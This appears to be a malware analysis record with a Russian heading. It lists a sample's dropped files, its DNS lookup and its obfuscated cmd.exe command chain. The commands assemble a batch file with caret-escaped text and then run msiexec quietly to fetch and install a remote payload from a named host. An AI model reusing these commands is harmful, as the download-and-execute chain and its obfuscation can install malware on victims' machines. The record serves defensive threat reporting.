Техническая информация
- '<SYSTEM32>\cmd.exe' /c ping 1 -n 5&cd %temp%© summary.csv up^DATE1.bat&up^DATE1.bat&up^DATE.bat ^/^^q^^/^i^
- %TEMP%\summary.csv
- %TEMP%\update1.bat
- %TEMP%\update.bat
- %HOMEPATH%\documents\msdn\office spell check control\eula.rtf
- %HOMEPATH%\documents\msdn\office spell check control\spellcheck.zip
- http://de###indaix.com/spellcheck.php
- DNS ASK de###indaix.com
- '<SYSTEM32>\cmd.exe' /c ping 1 -n 5&cd %temp%© summary.csv up^DATE1.bat&up^DATE1.bat&up^DATE.bat ^/^^q^^/^i^' (со скрытым окном)
- '<SYSTEM32>\ping.exe' 1 -n 5
- '<SYSTEM32>\cmd.exe' /C echo
- '<SYSTEM32>\cmd.exe' /S /D /c" set/p="msie" 1>%TEMP%\update.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" echo"
- '<SYSTEM32>\cmd.exe' /S /D /c" set/P="^xec%1" 1>>%TEMP%\update.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set/P="HTTP^://^deepmindaix.^com/spellcheck.^ph^p" 1>>%TEMP%\update.bat"
- '<SYSTEM32>\msiexec.exe' /q/iHTTP://de###indaix.com/spellcheck.php